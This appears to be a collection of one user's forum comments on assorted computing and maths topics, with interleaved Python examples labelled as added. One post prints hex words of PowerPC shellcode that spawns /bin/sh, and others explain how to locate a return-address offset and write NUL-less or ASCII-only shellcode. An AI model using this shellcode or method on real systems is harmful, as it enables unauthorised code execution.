So the alternative to running as Admin is running as Admin?
Erm? Shome mishtake, shurely?
YAW.
1) Now
2) Never
YAW.
Which bit of my post indicated that I had "a problem" with the case mod?
Are you sure you mean uterus?
The photo of it split apart had the twisted wires giving hints of a kind of pelvic shape, and maybe there was a kind of two-thighs/vulva proportioned 'gap' in between the drums. However, I'm having a hard time trying to get a uterus into any of the pictures.
Phil
On the same day as a Finn uses an industrial cooler unit to take his 3.2GHz PC (erm, collection of bits more like) to 4.8GHz via the medium of -100C temperatures.
Is this a Japan/Finland difference, or a Mac/PC user difference?
YAW.
Liquid paper and accidents are often found near each other, I find.
YAW.
Don't do this if they're sandblasting your building.
One PSU & one CD-R drive are now sitting somewhere in a Finnish landfill because of grit.
YAW.
Beth is often having com files dedicated to her, so there's most likely more than one beth.com. However, the ASCII .com files guru is Herbert, so at least that part of the search was correct and unambiguous, and the first hit you list is the one I remembered. (Although I remember the third one, the blocked link one, too now, it made me feel quite sick after staring at the screen for a couple of minutes!)
And seeing that Herbert post again after I realised what would be a better search term: "@echo off" as all of his batch files begin with that line. Here are some more:
Here's an ASCII program that he uses to ASCII-fy other programs (complete with source too, so you can ASCII-fy your own arbitrary code!)
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=utf-8&selm=3CFFE133.9870ABAD%40unibwm.de
Here's a useful text search/replace program:
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=utf-8&selm=3D16DD47.E7B409CD%40unibwm.de
Here he's being a little naughty, by the looks of things:
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=utf-8&selm=3E12B526.B0442AF2%40unibwm.de&prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3Dutf-8%26q%3D%2522%2540echo%2Boff%2522%2Bgroup%253Aalt.lang.asm%26btnG%3DGoogle%2BSearch
No idea what these are:
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=utf-8&selm=3E26D3B9.418F602%40unibwm.de&prev=/groups%3Fhl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3Dutf-8%26q%3D%2522%2540echo%2Boff%2522%2Bgroup%253Aalt.lang.asm%26btnG%3DGoogle%2BSearch
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=utf-8&selm=3F56D877.21190F72%40unibwm.de
However, you get the idea - once you can create a small decoder just in ASCII bytes, then you can create more complicated programs on the fly. From what Herbert said in one of those posts, Laura Fairhead also has such an ASCII-fying engine. The famous Terje Mathison also has one, which he was telling us about only very recently (either alt.lang.asm or comp.lang.asm.x86).
YAW.
Thanks for that extra tidbit. The quantity of hoop-jumping in that shellcode was quite minimal, and you've mostly explained why that was possible. However, even the PPC linux equivalent wasn't much longer.
I think that the DEC Alpha and Sparc shellcodes that I've seen have been the most contrived. (I saw one where almost every instruction needed to be modified!)
YAW.
NUL is '\0', the byte valued 0.
C uses '\0' to delimit strings. Therefore a strcat will not go past the first '\0' in the shellcode (or whatever exploit it is you're trying to run).
So, if the code you want to run needs '\0's in it, it must build those values on the fly. (e.g. subtract any value from itself and you instantly have a register loaded with 4 zeroes.) If you need opcodes that have 0 somewhere in them, then you need to self-modify, or you need to find a way to write what you want without using such opcodes. Most people go for the former.
That's all there is to being NUL-less. It's easy on x86, but slightly more challenging on fixed-length opcode machines (RISCs and VLIWs). Similarly, avoiding just '\0' is pretty easy - the real skill is in avoiding anything but [a-zA-Z0-9] such that you can pass some input sanitisers. (See posts by Herbert Kleebauer on alt.lang.asm for examples of ascii-only executables (one was called 'beth.com' IIRC, google should find it).)
To calculate the jump, just work out which of the 512 'A's are the 4 that you can see in the debugger stack trace. It's easiest to work this out by not having every character in the overflowing string being the same character. That's why I suggest 'abcdef...'
If you now see the backtrace as containing 0x66676869 then you know it was one of your 'fghi's that you're now looking at. However you don't know which one yet, so try again with a different repeated string with a different length, and 'triangulate'. Or simply use a single probe with a string that doesn't repeat, such as "aaabacad....azbabbbcbd....bzcacbcccd..."
Anyway, that tells you where in the string you need to put the address that you want to jump to. The next problem is working out what that address should be. This you can get from the debugger.
Read Aleph One's "smashing the stack for fun and profit" for more info. Once you can do it on one architecture, you'll be equipped to do it pretty much on all of them.
Have fun, but remember to practice safe hex.
YAW.
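The offset calculation the post above describes, as an added example that is not part of the original thread (the poster computes his probes in perl; Python is my choice here, and every function name and the sample offset 83 are constructed for the example). It builds both probe styles from the post: repeated alphabets of different lengths, whose candidate offsets are 'triangulated' by intersection, and the non-repeating pair string, which is checked to have unique 4-byte windows so that one probe is enough. The same arithmetic is what an analyst does when triaging a fuzzer crash that shows a frame like "#2 0x41414141 in ?? ()": it says which input bytes reached the saved return address, which is the first question in deciding how serious the bug is.

```python
"""Probe strings for finding which bytes of an overlong input ended up in
a saved return address (the "0x41414141 in ?? ()" frame in gdb).

Added example, not the poster's perl. Two probe styles from the thread:
repeated alphabets of different lengths that are 'triangulated', and a
single non-repeating pair string in which every 4-byte window is unique.
"""
import string


def repeated_probe(alphabet: str, times: int) -> bytes:
    """'abcdefghijklmnopqrstuvwxyz' x 20 style: ambiguous on its own,
    since the same 4 bytes recur every len(alphabet) positions."""
    return (alphabet * times).encode("ascii")


def pair_probe() -> bytes:
    """'aaabacad...azbabbbc...': every ordered pair of lowercase letters
    once; every 4-byte window is unique, so one probe is enough."""
    az = string.ascii_lowercase
    return "".join(x + y for x in az for y in az).encode("ascii")


def windows_are_unique(probe: bytes, width: int = 4) -> bool:
    """True if no width-byte window occurs twice in probe."""
    seen = set()
    for i in range(len(probe) - width + 1):
        w = probe[i:i + width]
        if w in seen:
            return False
        seen.add(w)
    return True


def word_to_bytes(word: int, big_endian: bool = True) -> bytes:
    """The value gdb prints, back into the 4 bytes that sat in memory.
    PPC (the thread's target) is big-endian; x86 shows them reversed."""
    return word.to_bytes(4, "big" if big_endian else "little")


def candidate_offsets(probe: bytes, word: int, big_endian: bool = True) -> list:
    """Every offset in probe whose 4 bytes equal the overwritten word."""
    needle = word_to_bytes(word, big_endian)
    hits, start = [], 0
    while True:
        i = probe.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def triangulate(probes_and_words, big_endian: bool = True) -> list:
    """Offsets consistent with every (probe, word) pair: the intersection of
    each probe's candidates. Alphabet lengths that are coprime (26 and 35
    here) leave a single answer well inside the probe length."""
    sets = [set(candidate_offsets(p, w, big_endian)) for p, w in probes_and_words]
    return sorted(set.intersection(*sets)) if sets else []


if __name__ == "__main__":
    # constructed crash: the input bytes at offset 83 overwrote the return address
    p1 = repeated_probe(string.ascii_lowercase, 20)
    p2 = repeated_probe(string.ascii_lowercase + "123456789", 16)
    w1 = int.from_bytes(p1[83:87], "big")   # what gdb would show for probe 1
    w2 = int.from_bytes(p2[83:87], "big")   # ... and for probe 2
    print(f"probe 1 alone: {len(candidate_offsets(p1, w1))} candidate offsets")
    print(f"both probes: {triangulate([(p1, w1), (p2, w2)])}")
    pp = pair_probe()
    wp = int.from_bytes(pp[83:87], "big")
    print(f"pair probe: unique windows={windows_are_unique(pp)}, "
          f"{wp:#x} found at {candidate_offsets(pp, wp)}")
```

With the 26-letter probe alone, 0x66676869 ('fghi') matches at 20 offsets, which is the ambiguity the post's "try again with a different length" resolves; the pair probe needs no second run.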
"Note that Monad scripts can actually be written in pretty much any .NET language, such as C# or JScript."
In that case it's not a scripting language at all, it's simply an API and/or compatibility layers for such an API?
".ppt"
The information is so important that they want to hide it in fluff, eh? However, I found what I believe to be the same presentation here: http://www.vikk.org/ms_cli/chuba79_slideshow/ and if so - it's an abomination. The quantity of boilerplate means that no one in their right mind will ever use it.
YAW.
Mac users, sorry, Mac zealots, are _great_! They have a magic instant wind-up button that's sooo easy to press.
I dearly love the POWER architecture, and so think the G5 is fantastic, and I foolishly boobed when asking a G5-owning friend to compile a Mac version of some of my code so that I could grab a benchmark, and be able to claim even greater portability of my code. My boob - to press the button.
The _one_ button. Have you worked out which one that is yet?
He hasn't spoken to me since!
YAW.
Hear, hear.
I've only read a few things of his (typically via slashdot stories), but I've been amazed at the number of times he's promoted Microsoft and their way of doing things even if it's patently obvious to the outsider that either their particular methodology was not the source of their success, or that they didn't actually have any success in the direction he claimed. Usually the latter, or the former where the real reasons were monopolistic business practices.
Out of Tog, Sporksky, and ESR, only Tog manages to be detached enough to be believable (or instead of 'detached' should I say he's right often enough with what could be considered universal truths, that aren't just Mac specific). However, all three are over-inflated IMHO.
(Gettys not much better but keeps a lower profile).
Some 'spokespeople' however, I think do represent their cases very well. Stroustrup and Berners-Lee, for example. But these are even lower-profile.
YAW.
Yeah, but if it was game of minesweeper that was being programmed. At least three of your hires are going to be sitting around twiddling their thumbs.
I'd just hire a Perl/Tk or Tcl/Tk hacker, and feed him enough coke and pizza to last him the single afternoon that it will take him to finish the task.
You'll be over-budget, and I'll be putting my feet up "testing" the program the next day.
YAW.
It doesn't look like csh, it looks more like perl.
In csh, $p would expand to the value of the scalar variable p.
Just because it's got an '=' sign doesn't mean it's an assignment.
> set p=/bin/ls
> $p = 2
/bin/ls: =: No such file or directory
/bin/ls: 2: No such file or directory
> touch =
> touch 2
> set p=/bin/ls
> $p = 2
2 =
There are some very good technical reasons why csh should be avoided, but aesthetics isn't really one of them. Reasons such as a fundamental inability to express certain useful concepts (such as independent piping of stdout and stderr). Similarly, if monad is supposed to be a shell scripting language it too should be avoided, as the above indicates that it seems fundamentally unable to run a program defined by a variable. That's a far more fundamental flaw than csh's stderr problems. (Yes, there's probably a way round it, but if they'd only stuck to common shell language syntactic conventions there wouldn't have been a hole to work around.)
YAW.
WTF has the far end's OS got to do with script kiddieness?
Are you getting confused by the fact that there are two parties involved in such an attack -- the script kiddie and the victim? Do you think that these two parties need to be running the same OS? Do you find yourself accidentally hacking or DoSsing your own system sometimes?
The level of ignorance that you display is part of the problem.
YAW.
Maybe, maybe not, depending on whether you admit the concept of infinite covering sets. Any other proof strategy of which you speak could quite probably be reworked into just an infinite covering set. (As if it were constructive, for example, it would lead /immediately/ to an (infinite number of) infinite covering set(s).)
Not everyone espouses infinite covering sets as a possibility, so if you don't you're certainly not on your own.
My personal view is that pretty much everything to do with prime densities that is based on the existence or non-existence of factors follows the heuristics (such as k-tuplet densities and the "C_n" figures for various cyclotomic types, but _not_ Wieferich/SSW primes), and the heuristics point to Seventeen-or-Bust running out of numbers to test by the time they've reached n=10^12 or similar. Which makes me definitely an infinite covering set sceptic.
So yes, my bias was coming through.
YAW.
"I don't see any demonstration (or even any indication) that this is exploitable."
Then what the fuck is "#2 0x41414141 in ?? ()"?
To me, that looks like user data in the stack frame.
To me, that means that an arbitrary jump can be executed.
To me, that means that arbitrary NUL-less code can be executed.
And the chances of there existing NUL-less BSD PPC shell-code are what, you ask?
Here's your answer -
0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6,
0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
0x7CC419AE, 0x7C8429D6, 0x7C842214, 0x7C043A14,
0x7CE72850, 0x7C852A14, 0x7C63212E, 0x7C832214,
0x7CC5212E, 0x7CA52A78, 0x44FFFF02, 0x7CE03B78,
0x44FFFF02, 0x4BFFFFA9, 0x2F62696E, 0x2F73685A,
0xFFFFFFFF, 0xFFFFFFFF
All someone's got to do is calculate the offset for the overwritten return stack to contain such that it calls the above code. That could be calculated with just 2 more probes with perl - use 'abcdefghijklmnopqrstuvwxyz' x 20 and 'abcdefghijklmnopqrstuvwxyz123456789' x 16 and tell me the values read off the stack.
If anything you should be thankful that 'Max' didn't publish real live exploit code, as then the script kiddies would be doing their best to run it already. At least this way they need to still fill in the gaps. Gaps that unfortunately I've just had to explain on a very public forum because a Mac user had his head in the clouds.
YAW.
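A check worth running on any payload that is claimed to be NUL-less, added here as an example; it is not the poster's code and makes no claim about the bug itself. It packs the 30 words listed above big-endian, as a PPC machine stores them, and reports which bytes would stop a strcpy/strcat and which fall outside [a-zA-Z0-9], the two constraints the earlier post on NUL-less code explains. Run over these words it finds exactly one 0x00 byte, at byte offset 10 inside the third word 0x41BC005C, so a C string copy would carry only the first 10 bytes of the listing. All function names are my own; the functions accept any byte string.

```python
"""Byte-constraint checks for a payload that has to survive C string
handling: "NUL-less" (no 0x00, since strcpy/strcat stop at the first one)
and the stricter ASCII-only [a-zA-Z0-9] needed to get past a sanitiser.

Added example, not the poster's code. PPC_WORDS are the 30 words listed in
the post above, packed big-endian as a PPC machine stores them; the check
functions take any byte string.
"""
import string

PPC_WORDS = [
    0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6,
    0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
    0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
    0x7CC419AE, 0x7C8429D6, 0x7C842214, 0x7C043A14,
    0x7CE72850, 0x7C852A14, 0x7C63212E, 0x7C832214,
    0x7CC5212E, 0x7CA52A78, 0x44FFFF02, 0x7CE03B78,
    0x44FFFF02, 0x4BFFFFA9, 0x2F62696E, 0x2F73685A,
    0xFFFFFFFF, 0xFFFFFFFF,
]

# byte values that pass an [a-zA-Z0-9] sanitiser
ALNUM = frozenset(string.ascii_letters.encode() + string.digits.encode())


def pack_words(words, big_endian=True):
    """Serialise 32-bit words the way the target CPU lays them out."""
    return b"".join(w.to_bytes(4, "big" if big_endian else "little") for w in words)


def nul_offsets(data):
    """Offsets of every 0x00 byte; an empty list means the payload is NUL-less."""
    return [i for i, b in enumerate(data) if b == 0]


def c_string_prefix(data):
    """What strcpy/strcat would actually copy: everything before the first NUL."""
    i = data.find(b"\x00")
    return data if i < 0 else data[:i]


def non_alnum_offsets(data):
    """Offsets of bytes outside [a-zA-Z0-9]; empty means ASCII-only."""
    return [i for i, b in enumerate(data) if b not in ALNUM]


def report(words, big_endian=True):
    """Summarise both constraints for a list of 32-bit words."""
    data = pack_words(words, big_endian)
    nuls = nul_offsets(data)
    return {
        "length": len(data),
        "nul_less": not nuls,
        "first_nul_offset": nuls[0] if nuls else None,
        "first_nul_word": nuls[0] // 4 if nuls else None,  # index into words
        "bytes_surviving_strcpy": len(c_string_prefix(data)),
        "alnum_only": not non_alnum_offsets(data),
    }


if __name__ == "__main__":
    r = report(PPC_WORDS)
    for key, value in r.items():
        print(f"{key}: {value}")
    if r["first_nul_word"] is not None:
        w = r["first_nul_word"]
        print(f"word {w} is 0x{PPC_WORDS[w]:08X}")
```

The endianness flag matters: the same words packed little-endian put the zero byte at a different offset, so the check must be run with the byte order of the machine the payload is meant for.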
You can construct an infinite number of provable Sierpinski numbers through finding what are called "covering sets". These are sets of factors that repeat in the sequence k*2^n+1, with fixed k, and variable n.
e.g. as long as k is not divisible by 3, then half of the values k*2^n+1 will be divisible by 3. For some k it will be the even n's, for other k it will be the odd n's. Either way, you've already covered half the possibilities with a known factor. Fill in 1/4 of the values by ensuring that 5 divides half of the ones not divisible by 3, hey presto - only 1/4 now remain. 17 can remove 1/8, leaving 1/8. 65537 can remove 1/16, leaving 1/16. Between them, 241, 97 and 673 can remove 1/16 (as they can each remove 1/48). That's it - there's your covering set {3,5,17,65537,241,97,673}.
Finding which k values actually use this covering set is an exercise in using the Chinese Remainder Theorem.
(note - may be errors in the above, I did it off the top of my head, but looks right.)
If you can't find a covering set, and for the remaining 11 numbers that looks most likely, then you're right, you can't know for sure that there is no prime.
YAW.
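The covering-set construction and the Chinese Remainder Theorem step from the post above, carried through as an added Python example (my code, not the poster's; all function names are my own). find_covering takes a set of primes, computes the order of 2 modulo each, and searches for residue classes of n that together cover every n modulo the period; sierpinski_from_covering then solves k ≡ -2^(-r_p) (mod p) by the CRT, which is the k for which p divides k*2^n+1 on its whole class; has_covering_factor is the sanity check on the result. Run on the set as written in the post, {3,5,17,65537,241,97,673}, the search reports no cover: 2 has order 32 modulo 65537, so that prime covers only 1/32 of the exponents and the seven classes can reach at most 95 of the 96 residues of the period. With 257 (order 16) in place of 65537 the cover closes, and the same search also recovers a cover for the classical set {3,5,7,13,19,37,73} behind 78557.

```python
"""Covering sets for Sierpinski numbers k*2^n+1, and the Chinese Remainder
Theorem step that turns a covering set into actual k values.

Added example, not the poster's code. A prime p with 2^e ≡ 1 (mod p)
divides k*2^n+1 for all n in one residue class mod e once k is chosen
suitably; a set of primes whose classes cover every n is a covering set.
"""
from functools import reduce
from math import gcd


def lcm(a, b):
    return a * b // gcd(a, b)


def order_of_two(p):
    """Smallest e > 0 with 2^e ≡ 1 (mod p), for an odd prime p."""
    e, v = 1, 2 % p
    while v != 1:
        v, e = (v * 2) % p, e + 1
    return e


def find_covering(primes):
    """Search for residues r_p such that every n (mod period) satisfies
    n ≡ r_p (mod ord_p(2)) for some p. Returns {p: (r_p, ord_p)} or None."""
    orders = {p: order_of_two(p) for p in primes}
    period = reduce(lcm, orders.values(), 1)
    ordered = sorted(primes, key=lambda p: orders[p])  # largest classes first
    choice = {}

    def dfs(i, uncovered):
        if not uncovered:
            return True
        # bound: prime p can cover at most period/ord_p residues
        if i == len(ordered) or len(uncovered) > sum(period // orders[p] for p in ordered[i:]):
            return False
        p, e = ordered[i], orders[ordered[i]]
        gain = lambda r: sum(1 for n in uncovered if n % e == r)
        for r in sorted(range(e), key=lambda r: -gain(r)):  # best class first
            choice[p] = r
            if dfs(i + 1, frozenset(n for n in uncovered if n % e != r)):
                return True
        del choice[p]
        return False

    if dfs(0, frozenset(range(period))):
        return {p: (choice[p], orders[p]) for p in primes}
    return None


def sierpinski_from_covering(cov):
    """CRT: k ≡ -2^(-r_p) (mod p) for every p makes p | k*2^n+1 whenever
    n ≡ r_p (mod ord_p). Returns the smallest odd positive k in that class."""
    k, m = 0, 1
    for p, (r, _) in cov.items():
        target = (-pow(2, -r, p)) % p            # pow(x, -r, p) needs Python 3.8+
        t = ((target - k) * pow(m, -1, p)) % p   # extend the solution to modulus m*p
        k, m = k + m * t, m * p
    return k if k % 2 else k + m


def has_covering_factor(k, primes, n_max=300):
    """Sanity check: every k*2^n+1 up to n_max has a proper factor in primes."""
    return all(
        any(v % p == 0 and v > p for p in primes)
        for v in (k * 2**n + 1 for n in range(n_max + 1))
    )


if __name__ == "__main__":
    for primes in ([3, 5, 17, 65537, 241, 97, 673], [3, 5, 17, 257, 241, 97, 673]):
        cov = find_covering(primes)
        if cov is None:
            print(primes, "-> no covering set (2 has order",
                  {p: order_of_two(p) for p in primes}, ")")
            continue
        k = sierpinski_from_covering(cov)
        print(primes, "-> k =", k, "checked:", has_covering_factor(k, primes))
```

The bound in dfs is what makes the poster's set fail instantly: with period lcm(2,4,8,32,24,48,48) = 96 the classes hold 48+24+12+3+4+2+2 = 95 residues, one short, so no choice of residues can be a cover.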
"It's called competition, and it's been proven, that when coupled with the right amount of cooperation, to be very good at advancing things."
The giraffe and the crab are a product of competition.
They consider themselves the most advanced long-necked-thing and walks-sideways-thing in the world.
Want an IT example? The browser with the blink tag was more advanced than the browser that came before it.
YAW.
Bullshit. Back in the 60s that word may have meant someone working obsessively on systems, but that included illegal entry to other people's communications networks.
Or does 2600Hz not exist in your spectrum? Take that soft cheese out of your ears in which case.
Phone phreakers were hackers. Phone phreakers broke the law.
Full stop.
YAW.
Why was everyone using 300 baud?
1200/75 half duplex made so much more sense.
Or at least to me it did. 75 is faster than my typing speed, after all.
ZX Spectrum + "Prism" modem, IIRC. Bliss.
YAW.
"In 1994 it was hard to find any good free porn sites."
Hahah, someone else who never heard of FSP! (a "push" version of FTP) There were plenty of FSP sites with gigs of porn. And that was when gigs was a lot.
Of course, abpe and asp were a continuous stream of porn too.
Or so a friend told me, eheh.
YAW.
Nah, inodes are a red herring, they're not user-visible, which filenames are. Symbolic links are far closer, they even reside in directory-space, like the VFAT virtual names.
YAW.
Having your head in the sand doesn't make you more elite.
Grow up.